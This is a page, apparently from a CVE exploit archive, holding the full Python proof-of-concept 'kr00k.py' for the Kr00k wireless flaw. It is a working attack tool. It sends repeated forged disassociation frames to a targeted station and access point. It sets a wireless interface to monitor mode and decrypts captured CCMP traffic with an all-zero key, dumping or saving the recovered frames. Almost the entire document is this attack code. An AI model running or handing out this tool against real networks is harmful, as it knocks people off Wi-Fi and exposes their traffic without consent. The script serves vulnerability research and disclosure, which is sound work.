4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / kr00k.py PY
#!/usr/bin/python3

import sys, os, time, re, argparse, threading
from scapy.sendrecv     import sniff, sendp
from scapy.layers.dot11 import Dot11, RadioTap, Dot11CCMP, Dot11FCS
from scapy.all import *
from Crypto.Cipher import AES
from subprocess import run, PIPE

class KR00K:
    """Kr00k proof of concept: try to decrypt CCMP frames with an all-zero key.

    The instance is configured from an ``argparse``-style namespace that
    provides ``interface``, ``victim``, ``verbose``, ``bssid`` and
    ``write_to`` attributes.
    """

    # All-zero 128-bit temporal key tried against every CCMP frame.
    ZERO_TK = bytes(16)

    def __init__(self, arg):
        """Copy the run configuration from the parsed command-line options.

        Args:
            arg: namespace with ``interface``, ``victim``, ``verbose``,
                ``bssid`` and ``write_to`` attributes.
        """
        self.interface = arg.interface
        self.sta_mac = arg.victim
        # "quiet" is the opposite of "verbose"; the hexdump of decrypted
        # frames is shown only when the caller asked for verbose output.
        self.quiet = not arg.verbose
        self.ap_mac = arg.bssid
        self.dst_path = arg.write_to

    def INFO(self, string):
        """Print *string* as a blue informational message."""
        print("\033[1;34m [*] " + string + " \033[0m")

    def ERROR(self, string):
        """Print *string* as a red error message."""
        print("\033[1;31m [-] " + string + " \033[0m")

    def SUCCESS(self, string):
        """Print *string* as a green success message."""
        print("\033[1;32m [+] " + string + " \033[0m")

    def WARNING(self, string):
        """Print *string* as a yellow warning message."""
        print("\033[1;33m [!] " + string + " \033[0m")

    def disassociation(self):
        """Send disassociation frames to the configured target every 3 seconds.

        Both the target station MAC and the access point BSSID are needed to
        build the frame. When either is missing nothing is sent and the
        method returns immediately, leaving the tool in passive listening
        mode. Otherwise this loops forever and is meant to run in a daemon
        thread.
        """
        if not self.sta_mac or not self.ap_mac:
            self.WARNING("no target/bssid specified, listening passively")
            return

        count = 5
        station = self.sta_mac.lower()
        access_point = self.ap_mac.lower()
        # The frame never changes, so build it once outside the loop.
        # addr1 = client mac, addr2 = addr3 = ap bssid
        pkt = RadioTap() / Dot11(
            addr1=station,
            addr2=access_point,
            addr3=access_point) / Dot11Disas()

        while True:
            sendp(pkt, iface=self.interface, count=count, verbose=False)
            self.SUCCESS(str(count) +
                         ' disassociation packets sent to: ' + self.sta_mac +
                         ' from: ' + self.ap_mac)
            time.sleep(3)

    def decrypt(self, pkt):
        """Try to decrypt *pkt* with the all-zero temporal key.

        Frames without a CCMP layer, frames lacking the addresses needed for
        the nonce, and frames whose decrypted payload does not start with the
        LLC/SNAP prefix ``aa aa 03`` are silently ignored. On success the
        payload is re-framed with an Ethernet-style header, announced,
        optionally hex-dumped (verbose mode) and optionally appended to the
        output capture file.

        Args:
            pkt: a scapy packet, as delivered by ``sniff`` or ``rdpcap``.
        """
        if not pkt.haslayer(Dot11CCMP):
            return

        ccmp = pkt[Dot11CCMP]
        if pkt.addr2 is None or pkt.addr3 is None:
            # The nonce and the rebuilt header both need these addresses.
            return

        addr2 = pkt.addr2.replace(":", "")
        addr3 = pkt.addr3.replace(":", "")
        PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(
            ccmp.PN5, ccmp.PN4, ccmp.PN3, ccmp.PN2, ccmp.PN1, ccmp.PN0)

        # Nonce = priority octet "00" + transmitter address + packet number.
        nonce = bytes.fromhex("00") + bytes.fromhex(addr2) + bytes.fromhex(PN)

        # The trailing 8 bytes are the MIC, which is not part of the
        # ciphertext proper.
        cipher_text = ccmp.data[:-8]
        cipher = AES.new(self.ZERO_TK, AES.MODE_CCM, nonce, mac_len=8)
        # No AAD is supplied: only decrypt() is called (the MIC is never
        # verified), and in CCM the AAD influences the tag, not the plaintext.
        plain_text = cipher.decrypt(cipher_text)

        # An explicit check instead of `assert`: asserts are stripped under
        # `python -O`, which would make every frame look like a success.
        if not plain_text.startswith(b'\xaa\xaa\x03'):
            return

        # Rebuild an Ethernet-style frame: destination, source, then the
        # EtherType taken from bytes 6..8 of the LLC/SNAP header.
        eth_header = bytes.fromhex(addr3 + addr2) + plain_text[6:8]
        packet = eth_header + plain_text[8:]
        self.SUCCESS("kr00k packet arrived !")

        if not self.quiet:
            hexdump(packet)
        if self.dst_path:
            wrpcap(self.dst_path, packet, append=True)

    def engage(self):
        """Start the disassociation thread and sniff frames on the interface.

        Every captured frame is handed to :meth:`decrypt`. The call blocks
        until sniffing stops.
        """
        t = threading.Thread(target=self.disassociation)
        t.daemon = True
        t.start()
        # store=False: frames are processed by the callback only; keeping
        # them all in memory would grow without bound on a long capture.
        sniff(iface=self.interface, prn=self.decrypt, store=False)

    def read_cap(self, cap):
        """Run :meth:`decrypt` over every packet of the capture file *cap*."""
        self.INFO("Reading %s ......."%(cap))
        for packet in rdpcap(cap):
            self.decrypt(packet)
        
def main():
    """Parse the command line and run the tool.

    With ``-r/--read`` an existing capture file is processed offline and no
    wireless interface is touched. Otherwise the interface given with
    ``-i/--interface`` is put into monitor mode on the requested channel via
    ``airmon-ng`` / ``iwconfig`` and live sniffing starts.

    Exits with status 2 (argparse usage error) when neither a capture file
    nor an interface is supplied, and with status 0 on Ctrl-C.
    """

    def _parse_bool(value):
        """Convert a command-line string to bool.

        ``type=bool`` would turn every non-empty string, including
        "False", into True.
        """
        text = str(value).strip().lower()
        if text in ('1', 'true', 't', 'yes', 'y', 'on'):
            return True
        if text in ('0', 'false', 'f', 'no', 'n', 'off', ''):
            return False
        raise argparse.ArgumentTypeError("expected a boolean value, got %r" % (value,))

    try:
        parser = argparse.ArgumentParser()

        parser.add_argument('-i', '--interface', dest="interface", default=None, type=str)
        # if not specified passive listen to all
        parser.add_argument('-t', '--target', dest="victim", default=None, type=str)
        # Accepts "-v", "-v True" and "-v False".
        parser.add_argument('-v', '--verbose', dest="verbose", nargs='?',
                            const=True, default=True, type=_parse_bool)
        parser.add_argument('-c', '--channel', dest="channel", default=1, type=int)
        parser.add_argument('-w', '--write', dest="write_to", default=None, type=str)
        parser.add_argument('-r', '--read', dest="read", default=None, type=str)
        parser.add_argument('--bssid', dest="bssid", default=None, type=str)

        options = parser.parse_args()

        # Live mode cannot work without an interface; fail with a usage
        # message instead of a TypeError further down.
        if options.read is None and not options.interface:
            parser.error("an interface (-i/--interface) is required "
                         "unless a capture is read with -r/--read")

        kr00k = KR00K(options)

        # Offline mode: only the capture file is needed, so the interface
        # is left alone.
        if options.read is not None:
            kr00k.read_cap(options.read)
            return

        def _run(command):
            """Run *command* (an argument list) without a shell, discarding its output."""
            try:
                run(command, stdout=PIPE)
            except FileNotFoundError:
                # Best effort, as before: a missing tool is reported, not fatal.
                kr00k.WARNING(command[0] + " not found, skipping")

        # NOTE(review): these steps presumably require root privileges; the
        # original root check was disabled and is not reinstated here.
        kr00k.INFO("killing processes that could cause trouble. (airmon-ng check kill)")
        _run(['airmon-ng', 'check', 'kill'])
        kr00k.INFO("initiating monitor mode")
        # Argument lists (no shell) keep user-supplied values from being
        # interpreted as shell syntax.
        _run(['airmon-ng', 'start', options.interface])
        kr00k.INFO("switching to specified channel")
        _run(['iwconfig', options.interface, 'channel', str(options.channel)])
        kr00k.INFO("engaging")
        kr00k.engage()

    except KeyboardInterrupt:
        print('Exit')
        sys.exit(0)

def spinning_cursor():
    """Yield the blue-coloured spinner frames ``| / - \\`` in an endless cycle."""
    # Pre-render the four coloured frames once, then replay them forever.
    frames = tuple('\033[1;34m'+glyph+"\033[0m" for glyph in '|/-\\')
    while True:
        yield from frames



def test():
    """Manual debugging helper: format the packet number of one fixed frame.

    Loads 'WPA2-PSK-Final.cap', takes the CCMP layer of the packet at index
    483 and renders its six PN octets (PN5 first) as a hex string. The
    result is not returned or printed.
    """
    capture = rdpcap('WPA2-PSK-Final.cap')
    ccmp = capture[483][Dot11CCMP]
    pn_octets = (ccmp.PN5, ccmp.PN4, ccmp.PN3, ccmp.PN2, ccmp.PN1, ccmp.PN0)
    PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(*pn_octets)



# Run the command-line entry point only when executed as a script,
# not when the module is imported.
if __name__ == '__main__':
    main()
    # test()  # manual debugging helper, disabled